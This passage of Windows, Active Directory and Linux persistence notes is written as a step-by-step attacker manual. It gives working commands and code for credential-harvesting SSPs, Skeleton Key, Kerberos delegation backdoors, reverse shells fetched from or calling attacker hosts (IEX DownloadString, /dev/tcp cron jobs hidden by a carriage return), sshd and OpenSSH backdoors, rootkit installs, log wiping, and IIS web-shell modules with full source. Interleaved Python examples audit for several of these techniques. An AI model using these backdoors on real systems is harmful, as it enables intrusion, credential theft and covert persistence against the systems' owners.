Or with the path hex-encoded so the stream name does not appear in the source (696E6465782E7068703A68696464656E2E6A7067 decodes to index.php:hidden.jpg):
<?php
$a="696E6465782E7068703"."A68696464656E2E6A7067";   # hex encoded
$b="a";
include(PACK('H*',$$b));
?>
Plain text in a stream:
>echo 9527 > 1.txt:flag.txt
>notepad 1.txt:flag.txt
Without a host file (the stream is attached to the directory itself):
>echo hide > :key.txt
>cd ../
>notepad test:key.txt
Upload filter bypass. The filename sent to the server versus what NTFS actually creates:
Uploaded filename              Result on the server
test.php:a.jpg                 test.php is created; the uploaded content goes into its a.jpg stream, the file itself stays empty
test.php::$DATA                test.php is created with the uploaded content (::$DATA is the default data stream)
test.php::$INDEX_ALLOCATION    a folder named test.php is created
test.php::$DATA\0.jpg          0.jpg is created
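Added example, not part of the original notes: string logic that reproduces how NTFS interprets the stream syntax in the table above, next to the naive extension checks the bypass defeats and a hardened check that rejects stream syntax before looking at the extension. Nothing is written to disk; the names are the ones from the table, the allow and block lists are assumptions.

```python
"""Effective NTFS target of an uploaded filename, and why extension checks must
run on that name rather than on the raw string (added example)."""

# Assumed policy lists for the two naive checks
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
BLOCKED_EXT = {"php", "asp", "aspx", "jsp"}


def ntfs_effective_target(raw_name):
    """Return (name_created_on_disk, kind, note) for an upload filename.

    test.php:a.jpg              -> test.php (file), content in stream a.jpg
    test.php::$DATA             -> test.php (file), content in the default stream
    test.php::$INDEX_ALLOCATION -> test.php (directory)
    """
    if ":" not in raw_name:
        return raw_name, "file", "ordinary file"
    base, _, rest = raw_name.partition(":")
    stream, _, stype = rest.partition(":")
    stype = stype.lower()
    if stream == "" and stype == "$index_allocation":
        return base, "directory", "::$INDEX_ALLOCATION addresses the directory index, so a folder is created"
    if stream == "" and stype in ("", "$data"):
        return base, "file", "::$DATA is the default data stream, so the content lands in the file itself"
    return base, "file", "content goes into alternate stream '%s'; the file's own data stays empty" % stream


def naive_blacklist_ok(raw_name):
    """Typical blacklist check: reject names whose last extension is a script type."""
    return raw_name.rsplit(".", 1)[-1].lower() not in BLOCKED_EXT


def naive_allowlist_ok(raw_name):
    """Typical allowlist check on the text after the last dot."""
    return raw_name.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def hardened_ok(raw_name):
    """Reject stream and path syntax outright, then check the extension of the
    name NTFS will actually create."""
    if any(c in raw_name for c in ":\\/\x00"):
        return False
    name, kind, _ = ntfs_effective_target(raw_name)
    return kind == "file" and naive_allowlist_ok(name)


if __name__ == "__main__":
    for n in ("test.php:a.jpg", "test.php::$DATA", "test.php::$INDEX_ALLOCATION", "photo.jpg"):
        target, kind, note = ntfs_effective_target(n)
        print("%-28s -> %-10s %-9s blacklist=%s allowlist=%s hardened=%s  (%s)" % (
            n, target, kind, naive_blacklist_ok(n), naive_allowlist_ok(n), hardened_ok(n), note))
```

The blacklist passes test.php::$DATA because its "extension" is php::$DATA, and the allowlist passes test.php:a.jpg because the last extension is jpg; both create test.php. Rejecting the colon (and path separators) before any extension logic closes the whole class, which is cheaper than trying to enumerate stream names.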

          ADS&JavaScript

Create test.txt with any content (this is the file the user is meant to work with). Write the program into a stream of it (calc.exe here):
>type calc.exe > test.txt:calc.exe
Create a file link to the stream with mklink:
>mklink config.txt test.txt:calc.exe
Create readme.txt with any content and mark it hidden. Create readme.js:
    var objShell = new ActiveXObject("shell.application");
    objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0);
    objShell.ShellExecute("README.txt", "", "", "open", 1);
Running readme.js launches calc.exe through the link (hidden window) and opens readme.txt as the decoy.

          Empire

          LNK后門

In Empire:
Empire> set Host http://192.168.1.150
Empire> set Port 8080
>launcher powershell <listener name>
From the generated launcher keep only the Base64 part.
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -EncScript <Base64>"
The shortcut still opens its original target; the encoded script also runs every time the user clicks it.




Remove the backdoor and restore the shortcut:
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -CleanUp"

          WMI

          Empire>powershell/persistence/elevated/wmi

          注入SSP被動收集密碼

Requires high privileges (the package is loaded into lsass).

          Mimikatz

In-memory only, does not survive a reboot:
>privilege::debug
>misc::memssp
Lock the screen so the user has to type the password again:
>rundll32.exe user32.dll,LockWorkStation
Credentials from subsequent logons are written to C:\Windows\System32\mimilsa.log.
Persistent variant: copy mimilib.dll from the mimikatz package into system32 and add it to the Security Packages list. The value is a REG_MULTI_SZ, so query it first and repeat the existing entries in the reg add:
>reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
>reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
Logon passwords are then written to C:\Windows\System32\kiwissp.log, and because lsass loads the package at every start it survives reboots.
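Added example, not part of the original notes, covering both the Password Filter DLL above (Notification Packages) and the mimilib SSP (Security Packages): both techniques append a module name to a REG_MULTI_SZ under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, and both reg add commands in the notes rewrite the whole list. The script parses the text reg query prints, reports entries outside a baseline and entries a careless reg add dropped, and builds a reg add that preserves the current list. The sample output is constructed, and the baseline sets are an assumption for a default member server.

```python
"""Audit the two LSA package lists from `reg query` output (added example)."""
import re

# Assumed stock entries; compare against your own build before relying on them
BASELINE = {
    "Notification Packages": {"scecli", "rassfm"},
    "Security Packages": {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u"},
}

# Constructed sample of `reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa`
# after both backdoors from the notes were installed. reg.exe prints the
# embedded NUL separators of a REG_MULTI_SZ as the two characters \0.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Notification Packages    REG_MULTI_SZ    scecli\0rassfm\0Win32Project3
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib
    LsaPid    REG_DWORD    0x2c4
"""

_LINE = re.compile(r"^\s*(?P<name>.+?)\s{2,}REG_MULTI_SZ\s+(?P<data>.*)$")


def parse_multi_sz_values(reg_query_output):
    """Map value name -> ordered list of entries for every REG_MULTI_SZ line."""
    values = {}
    for line in reg_query_output.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        entries = [e for e in m.group("data").strip().split("\\0") if e]
        values[m.group("name").strip()] = entries
    return values


def audit_lsa_packages(reg_query_output, baseline=BASELINE):
    """Return {value: {"unexpected": [...], "missing": [...]}} for the watched values.
    'unexpected' is the planted module; 'missing' catches a reg add that
    overwrote the list instead of extending it (a broken password filter chain
    is itself a sign someone touched the key)."""
    found = parse_multi_sz_values(reg_query_output)
    report = {}
    for name, expected in baseline.items():
        present = found.get(name, [])
        report[name] = {
            "unexpected": [e for e in present if e.lower() not in expected],
            "missing": sorted(expected - {e.lower() for e in present}),
        }
    return report


def reg_add_command(name, current_entries, new_entry):
    """Build the reg add that appends one entry while keeping the existing ones."""
    data = "\\0".join(list(current_entries) + [new_entry])
    return (f'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" /v "{name}" '
            f'/t REG_MULTI_SZ /d "{data}" /f')


if __name__ == "__main__":
    for value, r in audit_lsa_packages(SAMPLE_REG_QUERY).items():
        print(f"{value}: unexpected={r['unexpected']} missing={r['missing']}")
    print(reg_add_command("Notification Packages", ["scecli", "rassfm"], "Win32Project3"))
```

On a live host feed it the real output (reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa") and confirm each reported module name maps to a DLL in system32 that is signed and expected; the planted names in the notes (Win32Project3, mimilib) are the ones this sample flags.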

          Empire

Copy mimilib.dll into system32
>shell copy mimilib.dll C:\Windows\System32\
Use the module
>usemodule persistence/misc/install_ssp*
>set Path C:\Users\Administrator\mimilib.dll

          Powersploit

          >Import-Module .\PowerSploit.psm1>Install-SSP -Path .\mimilib.dll

          基于域策略文件權限后門

Group policy templates and scripts live on the DC under C:\Windows\SYSVOL\sysvol\zone.com\Policies, and every domain machine pulls them periodically. On the DC, grant Everyone full control on Policies:
>cacls C:\Windows\SYSVOL\sysvol\zone.com\Policies /e /t /c /g "EveryOne":f
With PowerView find the policy folder that applies to the target machine:
PS> Get-NETGPO -ComputerName sub2k8.zone.com | fl gpcfilesyspath
Open C:\Windows\SYSVOL\sysvol\zone.com\Policies\{id}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf and append:
    [Registry Values]
    MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,c:\windows\system32\calc.exe
    [Version]
    signature="$CHICAGO$"
    Revision=1
Refresh policy on the target:
>gpupdate /force
This sets an Image File Execution Options debugger for taskhost.exe, so every start of taskhost.exe runs the debugger path instead; replace c:\windows\system32\calc.exe with the backdoor. The Everyone ACL on SYSVOL is a loud, domain-wide change, and the template is applied by every machine the GPO is linked to, not only sub2k8.
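Added example, not part of the original notes: a scanner for the registry write the SYSVOL backdoor above plants. It parses the [Registry Values] section of a GptTmpl.inf security template and reports Image File Execution Options Debugger entries, which is what a defender reviewing SYSVOL changes wants to pick out. The template text is constructed (a stock header plus the appended entry); real files under SYSVOL are usually UTF-16 LE, so decode them before passing the text in.

```python
"""Find IFEO Debugger entries in a GptTmpl.inf security template (added example)."""
import configparser
import re

# Constructed template: stock [Unicode]/[Version] header, one benign value, and the planted IFEO entry
SAMPLE_GPTTMPL = r"""
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse=4,1
MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,c:\windows\system32\calc.exe
"""

# Registry type codes used in security templates (value format is <type>,<data>)
_TYPE_NAMES = {"1": "REG_SZ", "3": "REG_BINARY", "4": "REG_DWORD", "7": "REG_MULTI_SZ"}
_IFEO = re.compile(r"\\Image File Execution Options\\(?P<exe>[^\\]+)\\Debugger$", re.IGNORECASE)


def parse_registry_values(inf_text):
    """Return [(key_path, type_name, data)] for every line under [Registry Values]."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str            # keep registry paths case-intact instead of lowercasing them
    cp.read_string(inf_text)
    if not cp.has_section("Registry Values"):
        return []
    out = []
    for key, value in cp.items("Registry Values"):
        type_code, _, data = value.partition(",")
        type_code = type_code.strip()
        out.append((key, _TYPE_NAMES.get(type_code, type_code), data.strip()))
    return out


def find_ifeo_debuggers(inf_text):
    """Return [(hijacked_exe, debugger_command)] for IFEO Debugger values in the template."""
    hits = []
    for key, _, data in parse_registry_values(inf_text):
        m = _IFEO.search(key)
        if m:
            hits.append((m.group("exe"), data))
    return hits


if __name__ == "__main__":
    for exe, dbg in find_ifeo_debuggers(SAMPLE_GPTTMPL):
        print(f"IFEO debugger for {exe}: {dbg}")
```

To sweep a domain, read every Policies\{id}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf under SYSVOL (decode with utf-16 when the file starts with a BOM) and run find_ifeo_debuggers on each; any Debugger entry that is not a known, approved tool is a finding, whatever the GPO's display name says.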

          Kerberoasting后門

With the right to write servicePrincipalName, add an SPN to a domain user:
>setspn -U -A RDP/zone.com godadmin
Any host in the domain can then request a service ticket (TGS) for that SPN, which is encrypted with the user's password hash and can be cracked offline. https://github.com/malachitheninja/Invoke-Kerberoast
>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | select hash | ConvertTo-CSV -NoTypeInformation | Out-File xx.txt
or use Rubeus.exe (kerberoast).
Crack (mode 13100 is Kerberos 5 TGS-REP etype 23):
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
As a backdoor this only pays off if the account's password is crackable, or was set by the attacker.

          S4U2Self后門

On the DC, find accounts that have an SPN and a password that never expires:
>Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires | ? {($_.ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}
Dump the chosen account's hash with mimikatz dcsync:
>lsadump::dcsync /domain:zone.com /user:y
Plant the backdoor: allow that account resource-based constrained delegation to krbtgt
>Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount <account>
Use it: as y, run S4U to obtain a ticket for krbtgt while impersonating godadmin
>Rubeus.exe s4u /user:y /aes256:{aes256} /domain:zone.com /msdsspn:krbtgt /impersonateuser:godadmin
Inject the ticket and request service tickets for the DC's CIFS and LDAP services:
>Rubeus.exe asktgs /ticket:{} /service:cifs/dc.zone.com,ldap/dc.zone.com /ptt




          受限委派后門

http://192.168.0.107/ps/nishang/ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1
Creates a new service account with constrained delegation, or adds constrained delegation to an existing service account whose password is known. Must run on a domain controller. The demo creates a new backdoor account; the steps for an existing account are the same.
PS> Add-ConstrainedDelegationBackdoor -SamAccountName backdoor -Domain zone.com -AllowedToDelegateTo ldap/dc.zone.com
The default password is Password@123!; change the $Password parameter in the script to use another.
https://github.com/samratashok/ADModule
Import Microsoft.ActiveDirectory.Management.dll and Import-ActiveDirectory.ps1 from ADModule:
>Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
>Import-Module Import-ActiveDirectory.ps1
Logged on to the domain machine sub2k8 as the ordinary user y, get a TGT for the backdoor account with kekeo:
Kekeo# tgt::ask /user:backdoor /domain:zone.com /password:Password@123!
Then use S4U to get a service ticket for LDAP on the DC as the domain admin godadmin:
Kekeo# tgs::s4u /tgt:TGT_backdoor@ZONE.COM_krbtgt~zone.com@ZONE.COM.kirbi /user:godadmin@zone.com /service:ldap/dc.zone.com
Inject the TGS with mimikatz:
mimikatz# kerberos::ptt C:\Users\y.ZONE\Desktop\kekeo\x64\TGS_godadmin@zone.com@ZONE.COM_ldap~dc.zone.com@ZONE.COM.kirbi
With LDAP access as a domain admin, dcsync the krbtgt hash and forge a golden ticket from it:
mimikatz# lsadump::dcsync /user:krbtgt /domain:zone.com

          Skeleton Key萬能鑰匙

On the DC, in mimikatz:
>privilege::debug
>misc::skeleton
Afterwards any domain account can log on to any domain host with the password mimikatz; the real passwords keep working too. The patch lives in lsass memory only, so a reboot of the DC removes it.
Empire module:
>usemodule persistence/misc/skeleton_key*
If LSA Protection (RunAsPPL) is enabled, load the mimikatz driver and strip the protection from lsass first:
>privilege::debug
>!+
>!processprotect /process:lsass.exe /remove
>misc::skeleton

          唯一IP訪問

Bind shell that answers only to one source address:
>msfvenom -p windows/shell_hidden_bind_tcp LPORT=443 AHOST=192.168.0.107 -f exe > svchost.exe
Only connections from 192.168.0.107 get the shell; to any other client, including port scanners, the port looks closed.



          Linux cron后門

>msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.107 LPORT=12138 -f raw > /var/www/html/shell.sh
(crontab -l;printf "*/1 * * * * /bin/bash /tmp/shell.sh;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
The entry ends with a carriage return followed by "no crontab for <user>" padded to 100 characters, so crontab -l on a terminal overprints the real line and shows only the fake message; the raw spool file still contains the job.
Variant with no dropped file (bash /dev/tcp reverse shell, once an hour):
#!bash
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
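Added example, not part of the original notes: a check for the carriage-return trick above. It simulates what a terminal displays for a crontab line (a \r returns the cursor to column 0 and later characters overwrite earlier ones) and reports entries whose displayed text differs from the command cron will actually run. The sample crontab is constructed to match the first command in the notes.

```python
"""Detect crontab entries hidden behind a carriage return (added example)."""

CR = "\r"

# Constructed content of /var/spool/cron/crontabs/root after the backdoor above was planted
SAMPLE_CRONTAB = (
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/local/bin/backup.sh\n"
    "*/1 * * * * /bin/bash /tmp/shell.sh;/bin/bash --noprofile -i;"
    + CR + "no crontab for root" + " " * 100 + "\n"
)


def terminal_render(line):
    """What a terminal shows for one line: '\\r' moves the cursor to column 0
    and subsequent characters overwrite what was printed before."""
    buf, cursor = [], 0
    for ch in line.rstrip("\n"):
        if ch == CR:
            cursor = 0
            continue
        if cursor < len(buf):
            buf[cursor] = ch
        else:
            buf.append(ch)
        cursor += 1
    return "".join(buf).rstrip()


def split_cron_line(line):
    """Return (schedule, command) for a standard five-field entry, else None."""
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def find_hidden_entries(crontab_text):
    """Entries containing a carriage return, with the real command and the
    text `crontab -l` would appear to print on a terminal."""
    findings = []
    for raw in crontab_text.split("\n"):
        if not raw.strip() or raw.lstrip().startswith("#") or CR not in raw:
            continue
        parsed = split_cron_line(raw)
        if parsed is None:
            continue
        schedule, command = parsed
        findings.append({
            "schedule": schedule,
            "command": command.rstrip(),     # everything after the schedule is handed to sh -c
            "displayed": terminal_render(raw),
        })
    return findings


if __name__ == "__main__":
    for f in find_hidden_entries(SAMPLE_CRONTAB):
        print("schedule :", f["schedule"])
        print("displayed:", f["displayed"])
        print("actual   :", f["command"].split(CR, 1)[0])
```

On a live box the same thing can be seen with crontab -l | cat -A (the ^M marks the carriage return) or by reading /var/spool/cron/crontabs/<user> directly; the script is for sweeping collected spool files offline.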

          Strace記錄ssh密碼

Install strace
#apt-get install strace
Add an alias in ~/.bashrc (#vi ~/.bashrc):
alias ssh='strace -o /tmp/.log -e read,write,connect -s 2048 ssh'
Every outgoing ssh from that account is then traced, and the password the user types shows up in the read/write calls logged to /tmp/.log.

          SSHD后門

Create a symlink to sshd named su and start it on another port:
>ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
Port 31337 opens and root can log in with any password:
>ssh root@192.168.1.1 -p 31337
It works because sshd uses its own program name (argv[0], here su) as the PAM service name, so authentication goes through /etc/pam.d/su, which on common distributions starts with pam_rootok.so and succeeds outright for a process running as root. It needs UsePAM yes in the sshd configuration and does not survive a reboot unless relaunched.

          進程注入

http://cymothoa.sourceforge.net/
On the target, inject a bind shell into a running process:
>./cymothoa -p <PID> -s 1 -y <port>
Attacker:
>nc -vv <ip> <port>
The injected shell lives in the host process and dies with it.

          SSH wrapper后門

#cd /usr/sbin
#mv sshd ../bin
#echo '#!/usr/bin/perl' >sshd
#echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
#echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
#chmod u+x sshd
#/etc/init.d/sshd restart
sshd re-executes its own binary for every new connection with the client socket on stdin, so the wrapper runs per connection. If the peer's source port bytes spell "4A" (port 13377) it hands the socket to /bin/sh as root; otherwise it execs the real sshd with the original argv[0] so nothing looks different. From the attacker:
>socat STDIO TCP4:192.168.0.110:22,sourceport=13377
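Added example, not part of the original notes: what the wrapper's getpeername(STDIN) =~ /^..4A/ test actually matches. Perl's getpeername returns the raw sockaddr_in (2 bytes address family in host order, 2 bytes port in network order, 4 bytes IPv4 address, padding); the regex skips the family and requires the port bytes to be the ASCII characters 4 and A, i.e. 0x3441 = 13377, which is the sourceport in the socat command. The peer address used below is the one from the notes and is only a sample.

```python
"""Reproduce the source-port check of the perl sshd wrapper (added example)."""
import re
import socket
import struct

TRIGGER = re.compile(rb"^..4A")   # the wrapper's pattern, byte for byte


def sockaddr_in(port, ipv4="192.168.0.107"):
    """Pack a Linux sockaddr_in: family (host order), port (network order), address, 8 zero bytes."""
    return (struct.pack("=H", socket.AF_INET)
            + struct.pack("!H", port)
            + socket.inet_aton(ipv4)
            + b"\0" * 8)


def wrapper_triggers(peer_sockaddr):
    """True when the wrapper would hand the socket to /bin/sh."""
    return TRIGGER.match(peer_sockaddr) is not None


def port_for_marker(marker):
    """Source port whose two network-order bytes spell `marker` (two ASCII chars)."""
    return struct.unpack("!H", marker.encode("ascii"))[0]


def marker_for_port(port):
    return struct.pack("!H", port).decode("latin-1")


def ports_that_trigger(pattern=TRIGGER):
    """Every source port the pattern lets through; for this pattern exactly one."""
    return [p for p in range(1, 65536) if pattern.match(sockaddr_in(p))]


if __name__ == "__main__":
    print("marker 4A  -> source port", port_for_marker("4A"))
    print("port 13377 -> marker", marker_for_port(13377))
    print("triggering ports:", ports_that_trigger())
```

The check is independent of the client IP, so any host that happens to connect from source port 13377 gets a root shell; conversely, a NAT device that rewrites the source port in between breaks the backdoor, which is why the socat command pins the port explicitly.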

          SUID Shell

Copy bash and set the setuid bit; later run the copy with -p so bash keeps the effective uid instead of dropping it:
>cp /bin/bash /tmp/tmp
>chmod u+s /tmp/tmp
>/tmp/tmp -p
The copy must be made by root (it has to be root-owned) and it is useless if /tmp is mounted nosuid or cleared at boot.

          SSH公私鑰登錄

>vim /etc/ssh/sshd_config
Uncomment the public-key directives if they are commented out (PubkeyAuthentication yes, AuthorizedKeysFile .ssh/authorized_keys).
On the attacker, generate a key pair:
>ssh-keygen
Append the attacker's /root/.ssh/id_rsa.pub to /root/.ssh/authorized_keys on the target, then log in with the private key:
>ssh -i id_rsa root@1.1.1.1

          Reptile

https://github.com/f0rb1dd3n/Reptile (LKM rootkit)
Install the build dependencies and clone:
>apt install build-essential libncurses-dev linux-headers-$(uname -r)
>git clone https://github.com/f0rb1dd3n/Reptile.git

          Kbeast_rootkit

http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
Supported kernels (version setting in config.h): 0 = 2.6.18 (RHEL/CentOS 5.x), 1 = 2.6.32 (Ubuntu 10.x) [default]
Edit config.h: install path, log path, port, connection password and user.
./setup build
The attacker connects:
>telnet 192.168.1.1 13377

          OpenSSH后門

Download
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
Back up the configuration files
>mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
>mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
Install the build dependencies
CentOS:
>yum install -y openssl openssl-devel pam-devel zlib zlib-devel
Ubuntu:
>apt-get install -y openssl libssl-dev libpam0g-dev
>tar zxvf openssh-5.9p1.tar.gz
>tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
>cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
>cd openssh-5.9p1
>patch <sshbd5.9p1.diff
>vim includes.h
In includes.h: /tmp/ilog records the passwords of users logging in to this host, /tmp/olog records the credentials used from this host to log in to other machines (prefix the names with a dot to hide them), and SECRETPW is the backdoor password.
Check the running version so the patched build reports the same one:
>ssh -V
Edit version.h to match.
Build and install
CentOS 7:
>./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
>make clean
>make && make install
>systemctl restart sshd.service
Ubuntu:
>./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam
>make clean
>make && make install
Restart the service, then copy the timestamps of the backups onto the new configuration files:
>touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config
>touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config
The replaced binaries no longer match the package database, so rpm -V openssh-server or dpkg -V openssh-server exposes them immediately.
Cover tracks
>export HISTFILE=/dev/null
>export HISTSIZE=0
>export HISTFILESIZE=0
>sed -i 's/192.168.0.1/127.0.0.1/g' /root/.bash_history

          IPTables端口復用

>iptables -t nat -N LETMEIN
>iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
# open: a packet carrying this string puts the source IP on the "letmein" recent list
>iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
# close: a packet carrying this string removes the source IP from the list
>iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
# new connections to port 80 from a listed IP (seen within the last hour) are redirected to sshd
>iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
Attacker:
# open the port
>echo threathuntercoming | socat - tcp:192.168.0.110:80
# ssh through port 80
>ssh -p 80 root@192.168.0.110
# close it again
>echo threathunterleaving | socat - tcp:192.168.0.110:80
Everyone else still reaches the web server on 80; only the knocking IP is redirected. The rules do not survive a reboot unless they are saved.

          文件處理

>chattr +i shell.sh           make the file immutable; even root cannot change or delete it until chattr -i
>vim .shell.sh                a dot-prefixed name is hidden from a plain ls
>attrib +s +h +r 1.txt        Windows: mark the file system, hidden and read-only
>touch -r 1.file 2.file       copy the timestamps of 1.file onto 2.file

          IIS_Bin_Backdoor

From: https://github.com/WBGlIl/IIS_backdoor
Put IIS_backdoor_dll.dll in the web application's bin folder and register it as a managed module in web.config:
    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
        <system.webServer>
            <modules>
                <add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" />
            </modules>
        </system.webServer>
    </configuration>
Run commands through it with IIS_backdoor_shell.exe.
A module named IIS_backdoor is a giveaway, so rename the project and namespace to something that blends in (UrlRoutingModule here), rebuild the solution, put the DLL in bin and change web.config to:
    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
        <system.webServer>
            <modules>
                <add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
            </modules>
        </system.webServer>
    </configuration>
Once added, the module shows up as registered in the IIS Modules view.
To run a payload, generate raw shellcode with msf, pick the shellcode option in the client and drag the raw file in:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw

          IIS_NETDLL_Spy

From: https://github.com/Ivan1ee/NetDLLSpy
The original author describes three approaches: (1) compile the code into a DLL and create an aspx file that instantiates the backdoor class to run commands; (2) register an httphandler mapping for a chosen extension that runs a command, saves the output to a file on the web server and then reads the result back; (3) compile a JS script into a DLL with jsc.exe, add the mapping and connect with Caidao (China Chopper). The author's code was lightly modified here: an httphandler mapping for a chosen extension runs the command and writes the output straight into the page, so nothing has to be saved on the server and fetched afterwards.
Code:
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Web;

namespace IsapiModules
{
    public class Handler : IHttpHandler
    {
        public bool IsReusable
        {
            get { return false; }
        }

        public void ProcessRequest(HttpContext context)
        {
            string input = context.Request.Form["InternetInformationService"];  // command
            if (context.Request.Form["microsoft"] == "iis")  // do command
            {
                this.cmdShell(input);
            }
        }

        public void cmdShell(string input)
        {
            Process process = new Process();
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.UseShellExecute = false;
            process.StartInfo.Arguments = "/c " + input;
            process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process.Start();
            StreamReader output = process.StandardOutput;
            String result = output.ReadToEnd();
            output.Close();
            output.Dispose();
            HttpContext.Current.Response.Write(result);
        }
    }
}
Save it under any extension and compile with csc:
> C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs
Add to web.config:
<system.webServer>
    <handlers>
        <add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="script" preCondition="integratedMode" />
    </handlers>
</system.webServer>
Open IIS Manager: the module now appears in Handler Mappings.
Now request any file with the xxx extension
with the parameters microsoft=iis&InternetInformationService=net user


The third approach connects with Caidao; the code was modified here as well.
import System;
import System.Web;
import System.IO;

package IsapiModule
{
    public class Handler implements IHttpHandler
    {
        function IHttpHandler.ProcessRequest(context : HttpContext)
        {
            context.Response.Write("404 Not Found");
            var I = context;
            var Request = I.Request;
            var Response = I.Response;
            var Server = I.Server;
            eval(context.Request["Internet"]); // pass
        }
        function get IHttpHandler.IsReusable() : Boolean { return true }
    }
}
Compile with jsc
> C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js
Edit web.config and add the mapping; the extension chosen here is .iis
<system.webServer>
    <modules runAllManagedModulesForAllRequests="true"/>
    <directoryBrowse enabled="true"/>
    <staticContent>
        <mimeMap fileExtension=".json" mimeType="application/json" />
    </staticContent>
    <handlers>
        <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode"/>
    </handlers>
</system.webServer>
The mapping is added automatically. Now request any file with the iis extension.


Caidao can connect to it directly.
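Both IIS_Bin_Backdoor and IIS_NETDLL_Spy above survive only as `<add>` entries in web.config: a module that borrows a built-in name but points at a foreign type, or a handler that maps an odd extension to a managed class under a native-sounding name. The audit below is an added example, not the projects' code; its allowlist of built-in names and types is a small hand-written assumption, and on a real server the reference should be a clean applicationHost.config.

```python
"""Audit an IIS web.config for the module/handler registrations the two
write-ups above rely on (added example, not from either project)."""
import sys
import xml.etree.ElementTree as ET

# Assumption: a few real component names and the types they actually use.
# A known name with a different type is an impersonation.
KNOWN_MODULE_TYPES = {
    "UrlRoutingModule": "System.Web.Routing.UrlRoutingModule",
    "Session": "System.Web.SessionState.SessionStateModule",
}
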